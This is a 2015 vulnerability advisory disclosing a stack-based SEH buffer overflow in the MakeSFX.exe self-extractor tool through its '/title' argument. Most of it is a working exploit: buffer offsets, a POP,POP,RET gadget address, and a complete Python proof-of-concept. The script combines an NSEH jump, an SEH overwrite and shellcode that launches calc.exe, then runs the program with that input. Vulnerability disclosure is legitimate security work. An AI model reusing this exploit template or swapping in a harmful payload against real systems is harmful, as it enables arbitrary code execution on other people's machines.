[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-MAKESFX-BUFF-OVERFLOW-09302015.txt Vendor: ================================ freeextractor.sourceforge.net/FreeExtractor freeextractor.sourceforge.net/FreeExtractor/MakeSFX.exe Vulnerable Product: ================================================== MakeSFX.exe v1.44 Mar 19 2001 & Dec 10 2009 versions Vulnerability Type: ============================ Stack Based Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ========================= Converts a zip file into a 32-bit GUI Windows self-extractor. Example usage: makesfx.exe /zip="source.zip" /sfx="output.exe" [/title="Your Title"] [/website="http://www.example.com"] [/intro="This is a test self extractor"] [/defaultpath="$desktop$My Files"] [/autoextract] [/openexplorerwindow] [/shortcut="$desktop$Program Shortcut.lnk|$targetdir$Program.exe] [/delete] [/icon="MyIcon.ico"] [/overwrite] [/?] etc... The '/title' argument when supplied an overly long payload will overwrite NSEH & SEH exception handlers causing buffer overflow, we can then execute our aribitrary shellcode. I have seen some applications using MakeSFX.exe from .bat files for some automation purposes, if the local .bat file is replaced by malicious one attackers can cause mayhem on the system. Both versions from 2001 & 2009 are vulnerable but exploit setup will be off by 20 bytes. punksnotdead="A"*1078+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX v1.44 (Dec 10 2009) punksnotdead="A"*1158+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX v1.44 (Mar 19 2001) POC exploit code(s): ==================== We will exploit MakeSFX v1.44 (Mar 19 2001). I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH, Rebase all set to False, but it contains null 0x00. So no suitable SEH instruction address avail, I will instead have to use mona.py to look for POP,POP,RET instruction in outside modules and we find some... e.g. 0x77319529 : pop esi # pop edi # ret | {PAGE_READONLY} Python script to exploitz! ========================== import struct,os,subprocess #MakeSFX v1.44 (Mar 19 2001) pgm="C:\hyp3rlinx\MakeSFX.exe " #shellcode to pop calc.exe sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") #punksnotdead="A"*1158+"RRRR"+"BBBB" #<--- KABOOOOOOM! nseh="\xEB\x06"+"\x90"*2 seh=struct.pack('<L', 0x76F29529) punksnotdead="/title"+"A"*1158 + nseh + seh + sc + "\x90"*10 subprocess.Popen([pgm, punksnotdead], shell=False) Disclosure Timeline: ========================================================= Vendor Notification: NA Sept 30, 2015 : Public Disclosure Exploitation Technique: ======================= Local Tested successfully on Windows SP1 DisableExceptionChainValidation in registry set to '1' value of 1 disables the registry entry that prevents SEH overwrites. =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx